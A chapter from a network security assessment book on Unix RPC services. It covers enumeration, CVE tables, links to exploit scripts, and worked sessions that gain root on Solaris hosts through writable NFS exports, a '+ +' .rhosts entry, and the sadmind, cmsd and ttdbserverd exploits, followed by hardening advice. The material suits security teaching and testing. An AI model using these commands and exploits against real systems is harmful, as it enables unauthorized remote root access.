13. Assessing Unix RPC Services

Search in book...
Toggle Font Controls
Create new playlist

Name your new playlist

Playlist description (optional)
Sign In

Email address

Password

Forgot Password?

or

Continue with Facebook

Continue with Google
Sign Up

Full Name

Email address

Confirm Email Address

Password

or

Continue with Facebook

Continue with Google

Chapter 13. Assessing Unix RPC Services

Vulnerabilities in Unix RPC services have led to many large organizations falling victim to hackers over the last 10 years. One such incident in April 1999 resulted in the web sites of Playboy, Sprint, O’Reilly Media, Sony Music, Sun Microsystems, and others being mass-defaced by H4G1S and the Yorkshire Posse (HTML mirrored at http://www.2600.com/hackedphiles/current/oreilly/hacked/). In this chapter, I cover remote RPC service vulnerabilities in Solaris, IRIX, and Linux, exploring how these services are exploited in the wild and how you can protect them. In general, these services should not be presented to the public Internet and should be run only when absolutely necessary.

Enumerating Unix RPC Services

A number of interesting Unix daemons (including NIS+, NFS, and CDE components) run as Remote Procedure Call (RPC) services using dynamically assigned high ports. To keep track of registered endpoints and present clients with accurate details of listening RPC services, a portmapper service listens on TCP and UDP port 111, and sometimes on TCP and UDP port 32771 also.

The RPC portmapper (also known as rpcbind within Solaris) can be queried using the rpcinfo command found on most Unix-based platforms, as shown in Example 13-1.

Example 13-1. Using rpcinfo to list accessible RPC service endpoints

$ rpcinfo -p 192.168.0.50
program vers proto port  service
100000   4    tcp  111   rpcbind
100000   4    udp  111   rpcbind
100024   1    udp  32772 status
100024   1    tcp  32771 status
100021   4    udp  4045  nlockmgr
100021   2    tcp  4045  nlockmgr
100005   1    udp  32781 mountd
100005   1    tcp  32776 mountd
100003   2    udp  2049  nfs
100011   1    udp  32822 rquotad
100002   2    udp  32823 rusersd
100002   3    tcp  33180 rusersd

In this example, you can find the following:

status (rpc.statd) on TCP port 32771 and UDP port 32772
nlockmgr (rpc.lockd) on TCP and UDP port 4045
nfsd on UDP port 2049
rquotad on UDP port 32822
rusersd on TCP port 33180 and UDP port 32823

These services can be accessed and queried directly using client software, such as showmount and mount (to access nfsd and mountd), and rusers (to access rusersd, covered in Chapter 5).

Identifying RPC Services Without Portmapper Access

In networks protected by firewalls and other mechanisms, access to the RPC portmapper service running on port 111 is often filtered. Therefore, determined attackers can scan high port ranges (UDP and TCP ports 32771 through 34000 on Solaris hosts) to identify RPC services that are open to direct attack.

You can run Nmap with the -sR option to identify RPC services listening on high ports if the portmapper is inaccessible. Example 13-2 shows Nmap in use against a Solaris 9 host behind a firewall filtering the portmapper and services below port 1024.

Example 13-2. Using Nmap to find RPC services running on high ports

$ nmap -sR 10.0.0.9

Starting Nmap 4.10 ( http://www.insecure.org/nmap/ ) at 2007-04-01 20:39 UTC
Interesting ports on 10.0.0.9:
PORT      STATE SERVICE                        VERSION
4045/tcp  open  nlockmgr (nlockmgr V1-4)       1-4 (rpc #100021)
6000/tcp  open  X11
6112/tcp  open  dtspc
7100/tcp  open  font-service
32771/tcp open  ttdbserverd (ttdbserverd V1)   1 (rpc #100083)
32772/tcp open  kcms_server (kcms_server V1)   1 (rpc #100221)
32773/tcp open  metad (metad V1)               1 (rpc #100229)
32774/tcp open  metamhd (metamhd V1)           1 (rpc #100230)
32775/tcp open  rpc.metamedd (rpc.metamedd V1) 1 (rpc #100242)
32776/tcp open  rusersd (rusersd V2-3)         2-3 (rpc #100002)
32777/tcp open  status (status V1)             1 (rpc #100024)
32778/tcp open  sometimes-rpc19
32779/tcp open  sometimes-rpc21
32780/tcp open  dmispd (dmispd V1)             1 (rpc #300598)

Connecting to RPC Services Without Portmapper Access

If network access to the RPC portmapper service is filtered and you try to use an RPC client, such as showmount, it will fail, as shown here:

$ showmount -e 10.0.0.9
mount clntudp_create: RPC: Port mapper failure RPC: Unable to receive

The portmapper is required to orchestrate and manage the connection between the RPC client and service endpoint. To connect to remote RPC endpoints without an available portmapper using standard RPC clients, we must configure a local RPC portmapper and proxy the RPC endpoint connections through to the remote (target) server.

This technique is described by David Routin in his paper at http://www.milw0rm.com/papers/154, and it requires that the following utilities be installed and available on the local RPC attack proxy server:

netcat
inetd
portmap
pmap_set

RPC Service Vulnerabilities

Due to the number of different RPC services, associated prognum values, CVE references, and vulnerable platforms, it is difficult to simply group bugs and talk about them individually. I have put together the matrix of popular services and vulnerable platforms shown in Table 13-1. A small number of obscure IRIX services (rpc.xfsmd, rpc.espd, etc.) aren’t listed; you can investigate them through MITRE CVE and other sources.

Table 13-1. Vulnerable RPC services, CVE references, and exploit framework support

Program number	Service	CVE references	Exploit framework support
Program number	Service	CVE references	IMPACT	CANVAS	MSF	LSD
100000	portmapper	CVE-2007-0736 CVE-1999-190
100003	nfsd	CVE-1999-0832
100004	ypserv	CVE-2000-1043 CVE-2000-1042
100005	mountd	CVE-2005-0139 CVE-2003-0252 CVE-1999-0002
100007	ypbind	CVE-2001-1328 CVE-2000-1041		✓
100008	rwalld	CVE-2002-0573	✓
100009	yppasswd	CVE-2001-0779		✓		✓
100024	statd	CVE-2000-0666 CVE-1999-0493 CVE-1999-0019 CVE-1999-0018	✓
100028	ypupdated	CVE-1999-0208
100068	cmsd	CVE-2002-1998
		CVE-2002-0391		✓
		CVE-1999-0696				✓
		CVE-1999-0320
100083	ttdbserverd	CVE-2002-0679 CVE-2002-0677
		CVE-2002-0391 CVE-2001-0717	✓	✓
		CVE-1999-0003	✓			✓
100099	autofsd	CVE-1999-0088
100232	sadmind	CVE-2003-0722 CVE-1999-0977	✓	✓	✓
100235	cachefsd	CVE-2002-0033				✓
		CVE-2002-0084	✓	✓
100249	snmpXdmid	CVE-2001-0236	✓	✓		✓
100300	nisd	CVE-1999-0795 CVE-1999-0008
150001	pcnfsd	CVE-1999-0078
300019	amd	CVE-1999-0704

Two sets of integer overflows were uncovered in 2002 and 2003 relating to XDR functions used in Solaris RPC services and associated components. These issues are listed in MITRE CVE as CVE-2003-0028 and CVE-2002-0391, and have multiple attack vectors, including .cmsd, ttdbserverd, and dmispd.

The LSD column in Table 13-1 does not relate to an exploitation framework, but the work of the Last Stage of Delirium (LSD) research team. LSD published reliable standalone exploits for the issues marked in Table 13-1, which are available in ZIP archives (solaris.zip and irix.zip) that are available from http://lsd-pl.net/code/. These ZIP archives are also available from the O’Reilly tools archive at http://examples.oreilly.com/networksa/tools/.

Exploits for vulnerabilities that are not covered by CORE IMPACT, Immunity CANVAS, MSF, or LSD are listed in the following sections of this chapter.

Abusing NFS and rpc.mountd (100005)

Three serious remotely exploitable bugs have been identified in the mountd and nfsd service binaries that are bundled with older Linux distributions (primarily Red Hat and Debian). The MITRE CVE references for these bugs are CVE-2003-0252, CVE-1999-0832, and CVE-1999-0002. Many DoS issues exist in recent NFS implementations, which you can investigate by checking MITRE CVE (http://cve.mitre.org).

CVE-2003-0252

In July 2003, an off-by-one bug was identified in the xlog( ) function of the mountd service bundled with multiple Linux distributions (including Debian 8.0, Slackware 8.1, and Red Hat Linux 6.2) as part of the nfs-utils-1.0.3 package. An exploit script for this issue is available at http://www.newroot.de/projects/mounty.c.

CVE-1999-0832

A second remotely exploitable issue was identified in Red Hat Linux 5.2 and Debian 2.1 and earlier relating to the rpc.nfsd service (as part of the nfs-server-2.2beta46 package) in November 1999. An exploit script for this issue is available at http://examples.oreilly.com/networksa/tools/rpc_nfsd2.c.

CVE-1999-0002

In October 1998, a serious remotely exploitable vulnerability was found in the NFS mountd service bundled with Red Hat Linux 5.1 (as part of the nfs-server-2.2beta29 package). Other Linux distributions were also found to be vulnerable, along with IRIX. Exploit scripts for this issue are available at:

http://examples.oreilly.com/networksa/tools/ADMmountd.tgz

http://examples.oreilly.com/networksa/tools/rpc.mountd.c

Listing and accessing exported directories through mountd and NFS

If the mountd service is running, you can use the Unix showmount command to list exported directories on the target host. These directories can be accessed and manipulated by using the mount command, and other NFS client utilities. In Example 13-3, I use showmount to query a Solaris 2.6 host at 10.0.0.6 and by writing a .rhost file to a user’s home directory, gain remote access privileges.

Example 13-3. Abusing writable NFS directories to gain direct host access

$ showmount -e 10.0.0.6
Export list for 10.0.0.6:
/home       (everyone)
/usr/local  onyx.trustmatta.com
/disk0      10.0.0.10,10.0.0.11
$ mount 10.0.0.6:/home /mnt
$ cd /mnt
$ ls -la
total 44
drwxr-x---  17 root      root    512 Jun 26 09:59 .
drwxr-xr-x   9 root      root    512 Oct 12 03:25 ..
drwx------   4 chris     users   512 Sep 20  2002 chris
drwxr-x---   4 david     users   512 Mar 12  2003 david
drwx------   3 chuck     users   512 Nov 20  2002 chuck
drwx--x--x   8 jarvis    users  1024 Oct 31 13:15 jarvis
$ cd jarvis
$ echo + + > .rhosts
$ cd /
$ umount /mnt
$ rsh -l jarvis 10.0.0.6 csh -i
Warning: no access to tty; thus no job control in this shell...
dockmaster%

Multiple Vendor rpc.statd (100024) Vulnerabilities

In recent years, four serious remotely exploitable bugs have been identified in the NFS status service (known as rpc.statd on most Unix-based platforms, and not to be confused with rpc.rstatd). These bugs are listed in Table 13-2, and exploit scripts are available from http://examples.oreilly.com/networksa/tools/.

Table 13-2. Recent rpc.statd vulnerabilities listed within MITRE CVE

CVE reference(s)	Affected platforms	Exploit scripts
CVE-2000-0666	Red Hat 6.2, Mandrake 7.1, and other Linux distributions	lsx.tgz, statdx2.tar.gz, and rpc-statd.c
CVE-1999-0493	Solaris 2.5.1	statd.tar.gz
CVE-1999-0018 and CVE-1999-0019	Solaris 2.4, IRIX, AIX, and HP-UX	dropstatd (Solaris binary)

Solaris rpc.sadmind (100232) Vulnerabilities

The Sun Solstice AdminSuite Daemon (sadmind) is enabled by default on Solaris 2.5.1 and later (up to Solaris 9 at the time of writing). sadmind has been found to be remotely vulnerable to two serious issues over recent years; they are known within MITRE CVE as CVE-1999-0977 and CVE-2003-0722.

CVE-1999-0977

The sadmind service running on Solaris 2.6 and 2.7 can be exploited by issuing a crafted RPC request, resulting in a stack overflow. Two exploits are effective at compromising vulnerable Solaris instances on Intel (x86) and SPARC architectures and are available at:

http://examples.oreilly.com/networksa/tools/super-sadmind.c

http://examples.oreilly.com/networksa/tools/sadmind-brute.c

CVE-2003-0722

A more recent bug, identified in September 2003, relates to authentication within sadmind. By default, the sadmind service runs in a weak security mode known as AUTH_SYS. When running in this mode, sadmind accepts command requests containing the user and group IDs, as well as the originating system name. Because these values aren’t validated by the sadmind service, you can gain access to a vulnerable system by sending a crafted RPC request. Because this bug doesn’t rely on memory manipulation, it can be exploited very easily to circumvent proactive mechanisms that may be in use, such as stack protection.

H D Moore wrote a Perl exploit script called rootdown.pl, available at http://www.metasploit.com/tools/rootdown.pl. This script has been integrated into MSF and can be run from the framework with ease.

Example 13-4 shows the rootdown.pl script in use against a Solaris 9 server at 10.0.0.9. As shown in Example 13-4, you can write "+ +" into a user’s .rhosts file (the bin user this case) to easily gain access.

Example 13-4. Exploiting a Solaris 9 host with rootdown.pl

$ perl rootdown.pl -h 10.0.0.9 -i

sadmind> echo + + > /usr/bin/.rhosts
Success: your command has been executed successfully.

sadmind> exit

Exiting interactive mode...
$ rsh -l bin 10.0.0.9 csh -i
Warning: no access to tty; thus no job control in this shell...
onyx% uname -a
SunOS onyx 5.9 Generic_112234-08 i86pc i386 i86pc

Multiple Vendor rpc.cmsd (100068) Vulnerabilities

In recent years, four serious remotely exploitable bugs have been identified in the CDE Calendar Manager Service Daemon (CMSD), known as rpc.cmsd on most Unix-based platforms. These bugs are listed in Table 13-3, and exploit scripts are available from http://examples.oreilly.com/networksa/tools/.

Table 13-3. Recent rpc.cmsd vulnerabilities listed within MITRE CVE

CVE reference	Affected platforms	Exploit scripts
CVE-2002-1998	SCO UnixWare 7.1.1 and OpenUnix 8.0.0	unixware_cmsd.c
CVE-2002-0391	Solaris 9 and other BSD-derived platforms	(Immunity CANVAS supports these exploits)
CVE-1999-0696	Solaris 2.7, HP-UX 11.00, Tru64 4.0f, and SCO UnixWare 7.1.0	lsd_cmsd.c and cmsd.tgz
CVE-1999-0320	Solaris 2.5.1 and SunOS 4.1.4	N/A

Example 13-5 shows the usage of the compiled cmsd exploit (found in cmsd.tgz).

Example 13-5. cmsd exploit usage

$ ./cmsd
usage: cmsd [-s] [-h hostname] [-c command] [-u port] [-t port]
       version host

   -s: just start up rpc.cmsd (useful with a firewalled portmapper)
   -h: (for 2.6) specifies the hostname of the target
   -c: specifies an alternate command
   -u: specifies a port for the udp portion of the attack
   -t: specifies a port for the tcp portion of the attack

Available versions:
   1: Solaris 2.5.1 /usr/dt/bin/rpc.cmsd      338844 [2-5]
   2: Solaris 2.5.1 /usr/openwin/bin/rpc.cmsd 200284 [2-4]
   3: Solaris 2.5   /usr/openwin/bin/rpc.cmsd 271892 [2-4]
   4: Solaris 2.6   /usr/dt/bin/rpc.cmsd      347712 [2-5]
   5: Solaris 7     /usr/dt/bin/rpc.cmsd
   6: Solaris 7     /usr/dt/bin/rpc.cmsd (2)
   7: Solaris 7 (x86) .../dt/bin/rpc.cmsd     329080 [2-5]
   8: Solaris 2.6_x86 .../dt/bin/rpc.cmsd     318008 [2-5]

For the exploit to work, you must build an RPC request that includes the local hostname (also known as the RPC cache name) of the target server. Under Solaris, there are a number of services that give away the hostname, including FTP, as shown here:

$ ftp 10.0.0.6
Connected to 10.0.0.6.
220 dockmaster FTP server (SunOS 5.6) ready.
Name (10.0.0.6:root):

After obtaining both the hostname and version of Solaris running on the target host, you can launch the cmsd exploit. If no command is specified, the tool binds /bin/sh to TCP port 1524, as shown in Example 13-6.

Example 13-6. Executing the rpc.cmsd overflow and gaining access

$ ./cmsd -h dockmaster 4 10.0.0.6
rtable_create worked
clnt_call[rtable_insert]: RPC: Unable to receive; errno = Connection
reset by peer
$ telnet 10.0.0.6 1524
Trying 10.0.0.6...
Connected to 10.0.0.6.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)

Multiple Vendor rpc.ttdbserverd (100083) Vulnerabilities

In recent years, four serious remotely exploitable bugs have been identified in the ToolTalk Database (TTDB) service, known as rpc.ttdbserverd on most Unix-based platforms. These bugs are listed in Table 13-4, and exploit scripts are available from http://examples.oreilly.com/networksa/tools/.

Table 13-4. Recent rpc.ttdbserverd vulnerabilities listed within MITRE CVE

CVE reference	Affected platforms	Exploit scripts
CVE-2002-0679	Solaris 9, HP-UX 11.11, Tru64 5.1A, AIX 5.1, SCO UnixWare 7.1.1, and OpenUnix 8.0.0	N/A
CVE-2002-0677	Solaris 9, HP-UX 11.11, Tru64 5.1A, AIX 5.1, SCO UnixWare 7.1.1, and OpenUnix 8.0.0	N/A
CVE-2002-0391	Solaris 9 and other BSD-derived platforms	(Immunity CANVAS and CORE IMPACT support these exploits)
CVE-2001-0717	Solaris 8, HP-UX 11.11, Tru64 5.1A, AIX 5.1, and IRIX 6.4	N/A
CVE-1999-0003	Solaris 2.6, HP-UX 11.0, and IRIX 6.5.2	lsd_irix_ttdb.c and lsd_sol_ttdb.c

Example 13-7 shows the LSD TTDB exploit in use against a Solaris 2.6 host at 10.0.0.6.

Example 13-7. The LSD Solaris rpc.ttdbserverd exploit in use

$ ./lsd_sol_ttdb
copyright LAST STAGE OF DELIRIUM jul 1998 poland  //lsd-pl.net/
rpc.ttdbserverd for solaris 2.3 2.4 2.5 2.5.1 2.6 sparc

usage: ./lsd_solttdb address [-s|-c command] [-p port] [-v 6]

$ ./lsd_sol_ttdb 10.0.0.6 -v 6
copyright LAST STAGE OF DELIRIUM jul 1998 poland  //lsd-pl.net/
rpc.ttdbserverd for solaris 2.3 2.4 2.5 2.5.1 2.6 sparc

adr=0xeffffaf8 timeout=10 port=32785 connected! sent!
SunOS dockmaster 5.6 Generic_105181-05 sun4u sparc SUNW,Ultra-5_10
id
uid=0(root) gid=0(root)

Unix RPC Services Countermeasures

The following countermeasures should be considered when hardening RPC services:

Don’t run rexd, rusersd, or rwalld RPC services because they are of minimal use and provide attackers with both useful information and direct access to your hosts.
In high-security environments, don’t offer any RPC services to the public Internet. Due to the complexity of these services, it is highly likely that zero-day exploit scripts will be available to attackers. RPC services should be filtered and disabled wherever possible, and should only be run where absolutely necessary.
To minimize the risk of internal or trusted attacks against necessary RPC services (such as NFS components, including statd, lockd, and mountd), install the latest vendor security patches.
Aggressively filter egress traffic, where possible, to ensure that even if an attack against an RPC service is successful, a connect-back shell can’t be spawned to the attacker.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.

Table of Contents for 13. Assessing Unix RPC Services

Create new playlist

Sign In

Sign Up